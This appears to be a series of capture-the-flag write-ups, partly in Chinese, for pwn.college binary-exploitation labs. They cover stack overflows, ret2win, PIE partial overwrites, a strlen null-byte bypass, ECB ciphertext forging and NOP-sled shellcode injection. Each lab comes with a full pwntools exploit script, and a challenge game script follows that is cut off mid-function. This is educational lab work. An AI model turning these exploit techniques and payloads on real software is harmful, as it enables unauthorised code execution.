
Analysis

ECB 模式下每个 16 字节 block 独立加密,相同明文 block 产生相同密文 block。因此可以:

  1. 调用 dispatch 获取合法的第一个 block(包含 VERIFIED header)的密文
  2. 将 payload 按 16 字节分块,逐块调用 dispatch 加密
  3. 拼接密文发送给 vulnerable-overflow,解密后得到我们的任意 payload

从 stack dump 中可以看到:

1
2
3
| 0x00007fff9c9fad20 (rsp+0x0040) | message buffer 开始位置
| ...                              | 120 bytes of 'A' padding
| 0x00007fff9c9fad98 (rsp+0x00b8) | saved return address -> 0x401e96
  • buffer 起始: rsp+0x40,saved rip: rsp+0xb8 → offset = 120 bytes
  • win() 地址: 0x4018f7

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python3
from Crypto.Util.Padding import pad
from pwn import *

context.log_level = "info"

OFFSET = 120
WIN_ADDR = 0x4018f7


def encrypt_block(block_data):
    """调用 dispatch 加密单个 16 字节 block,返回对应密文"""
    p = process(["/challenge/dispatch"], level="error")
    p.send(block_data)
    p.shutdown("send")  # 必须发送 EOF,否则 read1() 阻塞
    ct = p.recvall()
    p.close()
    return ct[16:32]  # 跳过第一个 block (VERIFIED header)


def build_payload():
    # 获取合法的第一个 block 密文 (通过 dispatch 加密任意 16 字节 message)
    p_init = process(["/challenge/dispatch"], level="error")
    p_init.send(b"A" * 16)
    p_init.shutdown("send")
    first_block_ct = p_init.recvall()[:16]
    p_init.close()

    raw_payload = b"A" * OFFSET + p64(WIN_ADDR)
    padded_payload = pad(raw_payload, 16)

    # 逐块加密,拼接密文
    final_ct = first_block_ct
    for i in range(0, len(padded_payload), 16):
        final_ct += encrypt_block(padded_payload[i : i + 16])

    log.success(f"Payload length: {len(final_ct)} bytes")
    return final_ct


def exploit():
    payload = build_payload()
    target = process("/challenge/vulnerable-overflow")
    target.send(payload)
    target.shutdown("send")
    print(target.recvall().decode(errors="ignore"))


if __name__ == "__main__":
    exploit()

Posted on In Disqus:

同 easy 版本的 ECB oracle + shellcode 注入,但没有 stack dump,需要手动逆向 offset。

Analysis

1
r2 -A -q -c "pdf @ sym.challenge" /challenge/vulnerable-overflow

关键溢出点:

1
2
3
4
5
6
; plaintext struct 起始于 s1 = rbp - 0x70
│           0x004016d3      lea rsi, [s1]           ; rbp - 0x70
; message buffer = s1 + 0x10 (跳过 header + length)
│           0x004016d7      add rsi, 0x10           ; rbp - 0x60
; buffer overflow
│           0x004016e1      call sym.imp.EVP_DecryptUpdate
  • message buffer: rbp - 0x60
  • saved rip: rbp + 0x08
  • offset = 0x60 + 0x08 = 104 bytes (与 easy 版本相同)

Exploit 完全相同,只需对应修改 buffer 地址即可。实际上因为栈地址固定且相同,exploit 代码可以直接复用。

Posted on In Disqus:

与 ECB-to-Win 类似的 ECB oracle + buffer overflow,但没有 win() 函数,需要注入 shellcode 并跳转执行。栈可执行。

Source

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int challenge(int argc, char **argv, char **envp)
{
    unsigned char key[16];
    struct
    {
        char header[8];
        unsigned long long length;
        char message[48];  // 比 win 版本更小
    } plaintext = {0};

    // ... 同样的 ECB 解密流程 ...

    // buffer overflow
    EVP_DecryptUpdate(ctx, plaintext.message, &decrypted_len,
                      ciphertext + 16, ciphertext_len - 16);

    // 会打印反汇编后的 shellcode 和栈布局
    print_disassembly(plaintext.message, decrypted_len);
}

Analysis

从 stack dump 中读取关键信息:

1
2
3
| 0x7fffffffec90 (rsp+0x0040) | message buffer 开始 (shellcode 放这里)
| ...                          | 104 bytes to saved rip
| 0x7fffffffecf8 (rsp+0x00a8) | saved return address
  • buffer 起始: 0x7fffffffec90
  • offset = 0xa8 - 0x40 = 104 bytes
  • 栈地址固定(ASLR 未随机化栈),直接将返回地址覆盖为 buffer 起始地址

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python3
from Crypto.Util.Padding import pad
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "info"

OFFSET = 104
BUFFER_ADDR = 0x7fffffffec90


def encrypt_block(block_data):
    p = process(["/challenge/dispatch"], level="error")
    p.send(block_data)
    p.shutdown("send")
    ct = p.recvall()
    p.close()
    return ct[16:32]


def build_payload():
    shellcode = asm(shellcraft.cat("/flag"))

    # shellcode + nop sled + return address
    raw_payload = shellcode.ljust(OFFSET, b"\x90") + p64(BUFFER_ADDR)

    # 获取合法的第一个 block 密文
    p_init = process(["/challenge/dispatch"], level="error")
    p_init.send(b"\x90" * 16)
    p_init.shutdown("send")
    first_block_ct = p_init.recvall()[:16]
    p_init.close()

    padded_payload = pad(raw_payload, 16)
    final_ct = first_block_ct
    for i in range(0, len(padded_payload), 16):
        final_ct += encrypt_block(padded_payload[i : i + 16])

    log.success(f"Payload length: {len(final_ct)} bytes")
    return final_ct


def exploit():
    payload = build_payload()
    target = process("/challenge/vulnerable-overflow", env={})
    target.send(payload)
    target.shutdown("send")
    print(target.recvall().decode(errors="ignore"))


if __name__ == "__main__":
    exploit()

Posted on In Disqus:

Your First Overflow (easy)

Buffer 20 bytes, win variable 20 bytes after buffer start. Overflow to set win variable non-zero.

1
2
3
4
5
6
7
hacker@binary-exploitation~your-first-overflow-easy:~$ /challenge/binary-exploitation-first-overflow-w
# buffer at rsp+0x0030, win variable at rsp+0x0040 (20 bytes after buffer)
# send 21+ bytes to overflow into win variable
Send your payload (up to 4096 bytes)!
aaaaaaaaaaaaaaaaaaaaa
You win! Here is your flag:
pwn.college{*******************************************}

Your First Overflow (hard)

1
2
3
4
5
6
7
8
9
10
int challenge(int argc, char **argv, char **envp)
{
    struct {
        char input[96];
        int win_variable;
    } data = {0};
    // ...
    int received = read(0, &data.input, (unsigned long) size);
    if (data.win_variable) { win(); }
}

need input 96 bytes + 1 byte to overflow win_variable.

1
2
3
4
5
from pwn import *

p = process('/challenge/binary-exploitation-first-overflow')
p.sendline(b'a' * 96 + b'a')
p.interactive()

pwn.college{*******************************************}

Precision (easy)

Buffer 51 bytes, win variable 52 bytes after buffer. Lose variable 56 bytes after buffer – must not overwrite it.

Send exactly 53 bytes (52 padding + 1 to set win, stop before lose).

1
2
3
4
5
from pwn import *

p = process('/challenge/binary-exploitation-lose-variable-w')
p.sendline(b'a' * 52 + b'a')
p.interactive()

pwn.college{*******************************************gzW}

Precision (hard)

1
r2 -A -q -c "pdf @ sym.challenge" /challenge/binary-exploitation-lose-variable

Key parts of sym.challenge:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
; buffer init: rep stosq with ecx=0xd (13), clearing 13*8=104 bytes
0x004017a9      488d5580       lea rdx, [format]            ; buffer start
0x004017b2      b90d000000     mov ecx, 0xd                 ; 13 iterations
0x004017ba      f348ab         rep stosq qword [rdi], rax   ; memset(buf, 0, 104)
; ...
; read into buffer at [format]
0x004017fe      488d4580       lea rax, [format]            ; buf = rbp - 0x80
; ...
; lose check
0x0040184a      8b45e8         mov eax, dword [var_18h]     ; lose @ [rbp - 0x18]
0x0040184d      85c0           test eax, eax
; win check
0x00401867      8b45e4         mov eax, dword [var_1ch]     ; win @ [rbp - 0x1c]
0x0040186a      85c0           test eax, eax
  • var_1ch -> [rbp - 0x1c]h 代表 Hex。
  • var_18h -> [rbp - 0x18]

Win 变量 [rbp - 0x1c]Lose 变量 [rbp - 0x18]

Buffer init 用 rep stosqmemset(buffer, 0, size)

  • stosq: 把 rax (0) 写入 rdi 指向的地址,每次 8 bytes。
  • rep 配合 ecx = 0xd (13),循环 13 次。
  • 13 * 8 = 104 bytes

已知 Lose 变量位于 [rbp - 0x18]。Buffer 起点位置 = Lose 变量往上推 104 字节。

0x18 + 104 (即 0x68) = 0x80

Buffer 起点 [rbp - 0x80],到 [rbp - 0x1c] = 100 bytes,接下来 4 bytes 是 Win 变量。

1
2
3
4
5
from pwn import *

p = process('/challenge/binary-exploitation-lose-variable')
p.sendline(b'a' * 100 + b'a')
p.interactive()

pwn.college{*******************************************gzW}

Variable Control (easy)

Buffer 29 bytes, win variable 32 bytes after buffer (must set to 0x5a71653b). Lose variable 36 bytes after buffer.

1
2
3
4
5
6
7
from pwn import *

p = process('/challenge/binary-exploitation-var-control-w')
padding = b'A' * 32
win_val = p32(0x5a71653b)
p.send(padding + win_val)
p.interactive()

pwn.college{*******************************************W}

Variable Control (hard)

1
r2 -A -q -c "pdf @ sym.challenge" /challenge/binary-exploitation-var-control

Key parts of sym.challenge:

1
2
3
4
5
6
7
8
9
10
11
12
; buffer init: rep stosq with ecx=0xb (11), 11*8=88 bytes
0x00402331      488d5590       lea rdx, [format]            ; buffer start
0x0040233a      b90b000000     mov ecx, 0xb                 ; 11 iterations
0x00402342      f348ab         rep stosq qword [rdi], rax   ; memset(buf, 0, 88)
; ...
; read into buffer at [format] = rbp - 0x70
; ...
; lose check @ [rbp - 0x18]
0x004023c0      8b45e8         mov eax, dword [var_18h]
; win check @ [rbp - 0x1c], must equal 0x16630978
0x004023dd      8b45e4         mov eax, dword [var_1ch]
0x004023e0      3d78096316     cmp eax, 0x16630978
1
2
3
4
>>> 88 + 0x18   # buffer size + lose offset from end
112
>>> 112 - 0x1c  # distance to win variable
84
1
2
3
4
5
6
7
from pwn import *

p = process('/challenge/binary-exploitation-var-control')
padding = b'A' * 84
win_val = p32(0x16630978)
p.send(padding + win_val)
p.interactive()

pwn.college{*******************************************W}

Control Hijack (easy)

No win variable. Overflow return address to jump to win() at 0x401e1d. Buffer starts 88 bytes before return address. Canary disabled, no PIE.

1
2
3
4
5
6
7
from pwn import *

p = process('/challenge/binary-exploitation-control-hijack-w')
padding = b'A' * 59 + b'B' * 29  # 88 bytes to reach return address
win_val = p32(0x401e1d)
p.send(padding + win_val)
p.interactive()

pwn.college{*******************************************}

Control Hijack (hard)

1
r2 -A -q -c "pdf @ sym.challenge; pdf @ sym.win" /challenge/binary-exploitation-control-hijack

Key parts of sym.challenge:

1
2
3
4
5
6
; buf -> rbp - 0x60
0x00401e5d      488d45a0       lea rax, [buf]
0x00401e61      4889c6         mov rsi, rax        ; read into buf
; ...
0x00401eb4      c9             leave
0x00401eb5      c3             ret

sym.win 入口: 0x00401cb9

在 x86_64 架构下,当一个函数被调用时,返回地址 (Return Address) 压入栈中。溢出覆盖返回地址为 sym.win,当 sym.challenge 执行 ret 时 CPU 跳去执行 win 函数。这叫 Ret2Win

  1. 输入缓冲区起点: rbp - 0x60

use r2 -A to analyze, default asm.var = true, visual mode shows variable names

  1. 到达返回地址的距离:
    • 覆盖局部变量: 96 字节 到达 rbp
    • 跨过 Saved RBP: 8 字节
    • Padding = 96 + 8 = 104 字节
  2. sym.win 入口: 0x00401cb9
1
2
3
4
5
6
7
from pwn import *

p = process('/challenge/binary-exploitation-control-hijack')
padding = b'A' * 96 + b'B' * 8
win_val = p32(0x401cb9)
p.send(padding + win_val)
p.interactive()

pwn.college{*******************************************}

Tricky Control Hijack (easy)

win_authed(int token) requires token == 0x1337, but we can bypass the check by jumping past it.

Buffer 31 bytes, return address 56 bytes after buffer. Canary disabled, no PIE.

1
r2 -A -q -c "pdf @ sym.win_authed" /challenge/binary-exploitation-control-hijack-2-w
1
2
3
4
0x00402031      817dfc3713..   cmp dword [var_4h], 0x1337
0x00402038      0f85fe000000   jne 0x40213c
; jump past the check to here:
0x0040203e      488d3dab10..   lea rdi, str.You_win__Here_is_your_flag:
1
2
3
4
5
6
7
from pwn import *

p = process('/challenge/binary-exploitation-control-hijack-2-w')
padding = b'A' * 31 + b'B' * 25  # 56 bytes
win_val = p32(0x0040203e)
p.send(padding + win_val)
p.interactive()

pwn.college{*******************************************}

Tricky Control Hijack (hard)

1
r2 -A -q -c "pdf @ sym.challenge; pdf @ sym.win_authed" /challenge/binary-exploitation-control-hijack-2
1
2
3
4
5
6
7
8
; sym.challenge: buf -> rbp - 0x40
0x0040157d      488d45c0       lea rax, [buf]

; sym.win_authed: jump past auth check
0x00401401      817dfc3713..   cmp dword [var_4h], 0x1337
0x00401408      0f85fe000000   jne 0x40150c
; ret to here:
0x0040140e      488d3df30b..   lea rdi, str.You_win__Here_is_your_flag:
1
2
3
4
5
6
7
from pwn import *

p = process('/challenge/binary-exploitation-control-hijack-2')
padding = b'A' * 0x40 + b'B' * 8
win_val = p32(0x0040140e)
p.send(padding + win_val)
p.interactive()

pwn.college{*******************************************}

PIEs (easy)

Position Independent Executable – Partial Overwrite

1. PIE 与内存分页 (Memory Paging)

开启了 PIE,Kernel 会在每次执行时,把 binary 塞到内存中一个完全随机的位置 (ASLR)。

但 Kernel 按 Page (页) 管理内存:

  • 一个 Memory Page = 0x1000 bytes (4KB)
  • 基址 (Base Address) 永远是 0x1000 的倍数
  • 最后三个 nibbles 永远是 000(例如 0x5f7be1ec2000

2. 偏移量 (Offset) 不变

虽然基址在变,但 win() 在 binary 内部的相对位置 (Offset) 编译时就决定了。 假设 win() offset 为 0x1337

  • 基址 0x5f7be1ec2000 -> win() = 0x5f7be1ec3337
  • 基址 0x6513a3b67000 -> win() = 0x6513a3b68337

最后三个 nibbles (337) 不变。

3. Partial Overwrite 与 Little-Endian

Little-Endian 下 Return Address 最低有效字节在最低地址,溢出时从最低字节开始覆盖:

  1. 改 1 字节 (2 nibbles): 不受 ASLR 影响,100% 成功
  2. 改 2 字节 (4 nibbles): 前 3 nibbles 固定,第 4 nibble 随机。一个 nibble 16 种可能,每次 $\frac{1}{16}$ 概率。

n 次至少成功一次:

$$P = 1 - \left(\frac{15}{16}\right)^n$$

  • 跑 11 次 50%
  • 跑 36 次 90%
1
r2 -A -q -c "pdf @ sym.win_authed" /challenge/binary-exploitation-pie-overflow-w
1
2
3
; buf -> rbp - 0x40, return address at rbp + 8, padding = 0x40 + 8 = 72 bytes
; jump past auth check:
0x00001a2b      488d3dbe16..   lea rdi, str.You_win__Here_is_your_flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
import itertools

binary_path = "/challenge/binary-exploitation-pie-overflow-w"
padding = b"A" * 0x40 + b"B" * 8

for count in itertools.count():
    p = process(binary_path)
    payload = padding + p16(0x1A2B)
    p.send(payload)
    output = p.clean(timeout=0.114514)

    if b"pwn.college{" in output:
        print(f"[+] Try {count}")
        print(output.decode('utf-8', errors='ignore'))
        p.close()
        break
    p.close()

pwn.college{*******************************************}

PIEs (hard)

1
r2 -A -q -c "pdf @ sym.challenge; pdf @ sym.win_authed" /challenge/binary-exploitation-pie-overflow
1
2
3
4
5
6
7
8
; sym.challenge: buf -> rbp - 0x90
0x00001ee3      488d8570ff..   lea rax, [buf]

; sym.win_authed: jump past auth check
0x00001cfb      817dfc3713..   cmp dword [var_4h], 0x1337
0x00001d02      0f85fe000000   jne 0x1e06
; ret to here -> 0x1d08
0x00001d08      488d3df912..   lea rdi, str.You_win__Here_is_your_flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
import itertools

binary_path = "/challenge/binary-exploitation-pie-overflow"
padding = b"A" * 0x90 + b"B" * 8

for count in itertools.count():
    p = process(binary_path)
    payload = padding + p16(0x1d08)
    p.send(payload)
    output = p.clean(timeout=0.114514)

    if b"pwn.college{" in output:
        print(f"[+] Try {count}")
        print(output.decode('utf-8', errors='ignore'))
        p.close()
        break
    p.close()

pwn.college{*******************************************}

String Lengths (easy)

Buffer 120 bytes, return address 168 bytes after buffer. PIE enabled, canary disabled.

Challenge uses strlen() to validate input length before copying to stack. But strlen() stops at the first \x00 (Null Byte).

在 C 语言中,字符串以 \x00 结尾。strlen() 碰到第一个 \x00 就停止计数。 在 payload 开头放一个 \x00strlen() 判定长度为 0,绕过长度检查。

1
r2 -A -q -c "pdf @ sym.challenge; pdf @ sym.win_authed" /challenge/binary-exploitation-null-write-w
1
2
3
4
5
6
7
; string_length < 120 assertion
0x00002b62      488d3d6d13..   lea rdi, str.string_length___120

; win_authed: jump past auth check -> 0x00002522
0x00002515      817dfc3713..   cmp dword [var_4h], 0x1337
0x0000251c      0f85fe000000   jne 0x2620
0x00002522      488d3dc70b..   lea rdi, str.You_win__Here_is_your_flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
import itertools

binary_path = "/challenge/binary-exploitation-null-write-w"
padding = b"\x00" + b"A" * 167  # 168 bytes total (null + 167 padding)

for count in itertools.count():
    p = process(binary_path)
    payload = padding + p16(0x2522)
    p.send(payload)
    output = p.clean(timeout=0.114514)

    if b"pwn.college{" in output:
        print(f"[+] Try {count}")
        print(output.decode('utf-8', errors='ignore'))
        p.close()
        break
    p.close()

pwn.college{*******************************************}

String Lengths (hard)

1
r2 -A -q -c "pdf @ sym.challenge; pdf @ sym.win_authed" /challenge/binary-exploitation-null-write
1
2
3
4
5
6
7
8
9
10
11
; sym.challenge:
; malloc tmp buffer, read into it, strlen check, then memcpy to stack
; buf on stack -> s1 = rbp - 0xa0
0x00001607      488d8560ff..   lea rax, [s1]
; string_length < 113 assertion (0x70 = 112, jbe means <= 112)
0x000015f1      488d3d7e0b..   lea rdi, str.string_length___113

; win_authed: jump past auth -> 0x000013ad
0x000013a0      817dfc3713..   cmp dword [var_4h], 0x1337
0x000013a7      0f85fe000000   jne 0x14ab
0x000013ad      488d3d540c..   lea rdi, str.You_win__Here_is_your_flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
import itertools

binary_path = "/challenge/binary-exploitation-null-write"
# 0xa0 + 8 - 1 = 167 bytes after null
padding = b"\x00" + b"A" * 167

for count in itertools.count():
    p = process(binary_path)
    payload = padding + p16(0x13ad)
    p.send(payload)
    output = p.clean(timeout=0.114514)

    if b"pwn.college{" in output:
        print(f"[+] Try {count}")
        print(output.decode('utf-8', errors='ignore'))
        p.close()
        break
    p.close()

pwn.college{*******************************************W}

Basic Shellcode

Shellcode copied onto stack and executed. Stack location randomized, so shellcode must be position-independent.

1
2
3
4
5
6
7
8
9
from pwn import *

context.update(arch="amd64", os="linux")

p = process("/challenge/binary-exploitation-basic-shellcode")
p.send(asm(shellcraft.cat("/flag")))
p.interactive()

# pwn.college{*******************************************}

NOP Sleds

NOP (No Operation) opcode \x90:什么都不做,仅把 RIP 向前移动一个字节。

NOP Sled 在 Shellcode 前铺上大量 \x90。跳到这片区域的任意位置,CPU 就会顺着一路”滑”到 Shellcode。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *

context.update(arch='amd64', os='linux')
context.log_level = 'error'

p = process('/challenge/binary-exploitation-nopsled-shellcode')

nop_sled = b'\x90' * 2048
shellcode = asm(shellcraft.cat('/flag'))
payload = (nop_sled + shellcode).ljust(4096, b'\x90')

p.send(payload)
p.interactive()

# pwn.college{*******************************************}

NULL-Free Shellcode

Same as prev, pwntools shellcraft.cat is already null-free.

pwn.college{*******************************************}

Hijack to (Mapped) Shellcode (easy)

Two-stage: first send shellcode to mmap’d region, then overflow return address to jump there. Buffer 112 bytes, canary disabled.

Shellcode mapped at 0x2edca000. Padding to return address = 137 bytes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
import time

context.update(arch='amd64', os='linux')
context.log_level = 'error'

p = process('/challenge/binary-exploitation-hijack-to-mmap-shellcode-w')

# Stage 1: send shellcode
shellcode = asm(shellcraft.cat('/flag'))
p.send(shellcode.ljust(4096, b'\x90'))
time.sleep(0.5)

# Stage 2: overflow return address
padding = b'A' * 137
p.send(padding + p64(0x2edca000))
p.interactive()

# pwn.college{*******************************************}

Hijack to (Mapped) Shellcode (hard)

1
r2 -A -q -c "pdf @ sym.challenge" /challenge/binary-exploitation-hijack-to-mmap-shellcode
1
2
3
4
5
6
7
8
9
; mmap shellcode at fixed address 0x178d0000
0x0000153c      bf00008d17     mov edi, 0x178d0000
0x00001541      e8bafbffff     call sym.imp.mmap
; ...
; getchar() waits for newline between shellcode read and overflow read
0x000015f9      e842fbffff     call sym.imp.getchar
; ...
; buf -> rbp - 0x30, padding = 0x30 + 8 = 56 bytes
0x00001622      488d45d0       lea rax, [buf]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *
import time

context.update(arch='amd64', os='linux')
context.log_level = 'error'

p = process('/challenge/binary-exploitation-hijack-to-mmap-shellcode')

# Stage 1: send shellcode
shellcode = asm(shellcraft.cat('/flag'))
p.send(shellcode.ljust(4096, b'\x90'))
time.sleep(0.5)

# Stage 2: press enter for getchar()
p.sendline()
time.sleep(0.5)

# Stage 3: overflow return address
padding = b'A' * 48 + b'B' * 8
p.send(padding + p64(0x178d0000))
p.interactive()

# pwn.college{*******************************************}

Hijack to Shellcode (easy)

Buffer 102 bytes, return address 136 bytes after buffer. ASLR disabled, stack executable, canary disabled, no PIE.

Stack addresses are fixed: buffer at 0x7fffffffd1a0, return address at 0x7fffffffd228.

NOP Sled 的必要性

通过 pwntoolsprocess() 跑程序和直接在 bash 里跑,传递的环境变量不同:

  • pwntools 可能带不同的 _ 变量、Python 继承的环境变量、argv[0] 路径长度不同
  • 环境变量占据空间变化导致栈指针偏移十几字节

\x90 NOP sled 铺在 shellcode 前面可以容忍这种偏移。

Stack Overlap / Self-Destruct

retRSP 上移 8 字节。如果 shellcode 紧贴返回地址,shellcode 中的 push 指令会往回覆盖自己的机器码(栈向下生长,push 减 RSP 写入数据)。

解决:用 padding 隔开 shellcode 和返回地址,让 shellcode 放在返回地址之前。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "error"

p = process("/challenge/binary-exploitation-hijack-to-shellcode-w")

target_address = 0x7FFFFFFFD1B0
offset = 136
nop_sled = b"\x90" * 32
shellcode = asm(shellcraft.cat("/flag"))
padding_len = offset - len(shellcode) - len(nop_sled)

# [NOP sled] + [Shellcode] + [Padding] + [RetAddr -> NOP sled]
payload = nop_sled + shellcode + (b"A" * padding_len) + p64(target_address)
p.send(payload)
p.interactive()

# pwn.college{*******************************************}

Hijack to Shellcode (hard)

1
r2 -A -q -c "pdf @ sym.challenge" /challenge/binary-exploitation-hijack-to-shellcode
1
2
3
; buf -> rbp - 0x40, padding = 0x40 + 8 = 72 bytes
0x00401d22      488d45c0       lea rax, [buf]
0x00401d26      4889c6         mov rsi, rax        ; read into buf

Use GDB (with ASLR disabled) to find exact buffer address:

1
2
3
4
5
pwngdb /challenge/binary-exploitation-hijack-to-shellcode
unset env
break *0x00401d2e
run
# rsi (buf) = 0x00007fffffffdc70

buffer -> 0x00007fffffffdc70

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "error"

p = process("/challenge/binary-exploitation-hijack-to-shellcode", env={})

# target somewhere in the NOP sled after return address
target_address = 0x00007fffffffdd70
offset = 72  # 0x40 + 8
shellcode = asm(shellcraft.cat("/flag"))
nop_sled = b"\x90" * 2000

# [Padding] + [RetAddr] + [NOP sled] + [Shellcode]
payload = b"A" * offset + p64(target_address) + nop_sled + shellcode
p.send(payload)
p.interactive()

# pwn.college{*******************************************}

Posted on In Disqus:

Patching Control Flow

This level is trickier: you’ll need to patch slightly trickier instructions. This gets you much closer to real patching for interoperability!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
#!/usr/bin/exec-suid -- /usr/bin/python3 -I

import termios
import random
import struct
import string
import sys
import os


class CIMG_NORMAL:
    MAGIC = b"cIMG"
    RENDER_FRAME =  struct.pack("<H", 1)
    RENDER_PATCH =  struct.pack("<H", 2)
    CREATE_SPRITE = struct.pack("<H", 3)
    RENDER_SPRITE = struct.pack("<H", 4)
    LOAD_SPRITE =   struct.pack("<H", 5)
    FLUSH =         struct.pack("<H", 6)
    SLEEP =         struct.pack("<H", 7)

class CIMG_1337:
    MAGIC = b"CNNR"
    RENDER_FRAME =  struct.pack("<H", 7)
    RENDER_PATCH =  struct.pack("<H", 6)
    CREATE_SPRITE = struct.pack("<H", 5)
    RENDER_SPRITE = struct.pack("<H", 4)
    LOAD_SPRITE =   struct.pack("<H", 3)
    FLUSH =         struct.pack("<H", 2)
    SLEEP =         struct.pack("<H", 1)

class GraphicsEngine:
    def __init__(self, width, height, cimg_version=4, cimg_ops=CIMG_1337):
        self.num_sprites = 0
        self.ops = cimg_ops
        self.width = width
        self.height = height
        self.output = os.fdopen(1, 'wb', buffering=0)

        self.output.write(
            self.ops.MAGIC +
            struct.pack("<H", cimg_version) +
            bytes([width, height]) +
            b"\xff\xff\xff\xff"
        )

    def render_frame_monochrome(self, lines, r=0xff, g=0xc6, b=0x27):
        self.output.write(
            self.ops.RENDER_FRAME +
            b"".join(bytes([r, g, b, c]) for c in b"".join(lines))
        )

    def render_patch_monochrome(self, lines, x, y, r=0xff, g=0xc6, b=0x27):
        assert all(b >= 20 and b <= 0x7e for b in b"".join(lines))
        self.output.write(
            self.ops.RENDER_PATCH +
            bytes([x, y, len(lines[0]), len(lines)]) +
            b"".join(bytes([r, g, b, c]) for c in b"".join(lines))
        )

    def create_sprite(self, lines, num=None):
        if num is None:
            num = self.num_sprites
            self.num_sprites += 1

        self.output.write(
            self.ops.CREATE_SPRITE +
            bytes([num, len(lines[0]), len(lines)]) +
            b"".join(lines)
        )
        return num

    def render_sprite(self, num, x, y, tile_x=1, tile_y=1, r=0x8c, g=0x1d, b=0x40, t=" "):
        self.output.write(
            self.ops.RENDER_SPRITE + bytes([num, r, g, b, x, y, tile_x, tile_y, ord(t)])
        )

    def flush(self, clear=True):
        self.output.write(self.ops.FLUSH + bytes([clear]))

    def sleep(self, ms):
        self.output.write(self.ops.SLEEP + struct.pack("<I", ms))

    def blank(self):
        self.render_patch_monochrome([ b" "*self.width ]*self.height, 1, 1)
        self.flush()

    def animate_text(self, text, x, y, r=None, g=None, b=None, interval=20):
        for i,c in enumerate(text):
            self.render_patch_monochrome(
                [bytes([ord(c)])], x+i, y,
                r=random.randrange(128, 256) if r is None else r,
                g=random.randrange(128, 256) if g is None else g,
                b=random.randrange(128, 256) if b is None else b
            )
            self.flush()
            self.sleep(interval)

class InputEngine:
    # adapted from https://github.com/magmax/python-readchar/blob/master/readchar/_posix_read.py
    @staticmethod
    def readchar():
        fd = sys.stdin.fileno()
        old_settings = termios.tcgetattr(fd)
        term = termios.tcgetattr(fd)
        try:
            term[3] &= ~(termios.ICANON | termios.ECHO | termios.IGNBRK | termios.BRKINT)
            termios.tcsetattr(fd, termios.TCSAFLUSH, term)
            return sys.stdin.read(1)
        finally:
            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)

def game():
    w = 70
    h = 20
    x = random.randrange(w)
    y = random.randrange(h)

    victory = False

    kb = InputEngine()
    screen = GraphicsEngine(w, h, cimg_ops=CIMG_NORMAL if "NOFLAG" in sys.argv else CIMG_1337)
    our_sprite = screen.create_sprite([ b"\\o/", b" ^ "])

    screen.render_frame_monochrome([ b"#"*(w) ]*(h), r=255, g=255, b=255)
    screen.render_patch_monochrome([ b" "*(w-2) ]*(h-2), 1, 1)
    screen.flush()

    screen.animate_text("WELCOME TO THE EPIC QUEST FOR THE FLAG", 4, 4)
    screen.animate_text("INSTRUCTIONS:", 4, 10)
    screen.animate_text("- w: UP", 4, 11)
    screen.animate_text("- a: LEFT", 4, 12)
    screen.animate_text("- s: DOWN", 4, 13)
    screen.animate_text("- d: RIGHT", 4, 14)
    screen.animate_text("- q: QUIT", 4, 15)
    screen.animate_text("- l: LOOK", 4, 16)
    screen.animate_text("YOUR GOAL: UNCOVER THE FLAG", 4, 17)
    screen.animate_text("PRESS ANY KEY TO BEGIN", 8, 18)
    if kb.readchar() in ("q", "\x03"):
        return

    screen.blank()

    try:
        if "NOFLAG" in sys.argv:
            flag = b"TEST"
        else:
            flag = open("/flag", "rb").read().strip()
    except FileNotFoundError:
        flag = b"ERROR: /flag NOT FOUND"
    except PermissionError:
        flag = b"ERROR: /flag permission denied"

    hidden_bytes = [ bytes([b]) for b in flag ][::-1]

    hidden_x = random.randrange(w)
    hidden_y = random.randrange(h)
    revealed_bytes = [ ]

    bomb_x = random.randrange(w)
    bomb_y = random.randrange(h)
    while bomb_x in (x, x+1, x+2) and bomb_y in (y, y+1):
        bomb_x = random.randrange(w)
        bomb_y = random.randrange(h)

    key = ""
    while True:
        # quit on q or ctrl-c
        if key == "q" or key == "\x03":
            break

        # move
        if key == "w": y = (y-1)%h
        if key == "a": x = (x-1)%w
        if key == "s": y = (y+1)%h
        if key == "d": x = (x+1)%w

        # check bomb
        if bomb_x in (x, x+1, x+2) and bomb_y in (y, y+1):
            screen.blank()
